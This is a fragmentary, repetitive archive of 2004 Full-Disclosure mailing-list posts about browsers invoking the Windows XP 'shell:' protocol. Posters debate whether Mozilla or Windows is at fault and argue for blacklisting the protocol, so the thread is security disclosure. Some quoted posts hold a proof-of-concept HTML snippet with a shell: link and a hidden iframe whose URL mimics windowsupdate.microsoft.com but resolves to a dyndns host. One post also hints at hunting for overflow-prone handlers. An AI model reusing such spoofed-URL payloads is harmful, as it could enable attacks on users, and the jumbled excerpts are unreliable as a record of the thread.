It doesn't seem to affect Windows 2000, only Windows XP.
This is a fault in Mozilla. Why? Because it allows access to a dangerous
protocol from within a non local resource. The Mozilla project should fix
this before anyone creates an exploit to run arbitrary code.
Personally I think the shell:
Did some quick search on Bugzilla and came up with the following:
Mozilla allows external protocols as discussed in:
http://bugzilla.mozilla.org/show_bug.cgi?id=167475
They seem to blacklist the following external protocol handlers:
(patch
This is not a real security matter
Denial of Service causing the user to reset his system is not a
security
issue?
I don't think that Denial of Service causing local user to reset his
system because of local application locks the whole system... is not a
security problem, but OS + Security
]
Subject: Re: [Full-Disclosure] shell:windows command question
Did some quick search on Bugzilla and came up with the following:
Mozilla allows external protocols as discussed in:
http://bugzilla.mozilla.org/show_bug.cgi?id=167475
They seem to blacklist the following external protocol handlers
: [EMAIL PROTECTED] - Email found in subject - Re:
[Full-Disclosure] shell:windows command question
This is dangerous. Based on the file extension of the shell
protocol different applications may be launched. For example:
shell:.its will launch Internet Explorer and shell:.mp3 will
launch
]
Subject: Re: [Full-Disclosure] shell:windows command question
On Wed, 7 Jul 2004, Perrymon, Josh L. wrote:
-snip--
centerbrbrimg src=nocigar.gif/center
center
a href=shell:windows\snakeoil.txtwho goes there/a/center iframe
src=http://windowsupdate.microsoft.com%2F.http
Darren Reed wrote:
A simple solution would be to add the shell protocol to this list.
Personally I think a secure blacklist is hard to maintain as new
dangerous external protocols could be invented by third-parties leaving
Mozilla vulnerable again.
Completely agreed.
There should be a
It's XP only. The functionality IS available in 2k but the syntax is
different.
JP
-Original Message-
From: Andrew Poodle [mailto:[EMAIL PROTECTED]
Sent: Thursday, July 08, 2004 8:55 AM
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] shell:windows command question
I might
I am the one that reported http://bugzilla.mozilla.org/show_bug.cgi?id=167475.
Since, I saw the debug team marked the report public, I will comment on
it. I agree with Andreas that it is a
very serious security flaw. When I was playing around with it I found
some of the suffixes it
In some mail from Barry Fitzgerald, sie said:
Darren Reed wrote:
A simple solution would be to add the shell protocol to this list.
Personally I think a secure blacklist is hard to maintain as new
dangerous external protocols could be invented by third-parties leaving
Mozilla vulnerable
In some mail from Barry Fitzgerald, sie said:
Andreas Sandblad wrote:
Did some quick search on Bugzilla and came up with the following:
Mozilla allows external protocols as discussed in:
http://bugzilla.mozilla.org/show_bug.cgi?id=167475
They seem to blacklist the following external
I am the one that reported http://bugzilla.mozilla.org/show_bug.cgi?id=167475.
Since, I saw the debug team marked the report public, I will comment on
it. I agree with Andreas that it is a
very serious security flaw. When I was playing around with it I found
some of the suffixes it
-snip--
centerbrbrimg src=nocigar.gif/center
center
a href=shell:windows\snakeoil.txtwho goes there/a/center iframe
src=http://windowsupdate.microsoft.com%2F.http-
equiv.dyndns.org/~http-equiv/b*llsh*t.html style=display:none
[customise as you see fit]
This is dangerous. Based on the file extension of the shell protocol
different applications may be launched. For example:
shell:.its will launch Internet Explorer
and shell:.mp3 will launch Winamp.
The trick is to find an application that will overflow when given a
very long parameter. A quick
I just verified this in Mozilla 1.7 on Windows XP pro.
(I know -- no reason why it shouldn't work on 1.7 if it worked on firefox)
In any case, it does appear to be an issue with MS Windows and not
Mozilla, but the Mozilla project should still, IMO, filter out the
shell: scheme type and other
On Wed, 7 Jul 2004, Perrymon, Josh L. wrote:
-snip--
centerbrbrimg src=nocigar.gif/center
center
a href=shell:windows\snakeoil.txtwho goes there/a/center iframe
src=http://windowsupdate.microsoft.com%2F.http-
equiv.dyndns.org/~http-equiv/b*llsh*t.html style=display:none
[customise as
16 matches
Mail list logo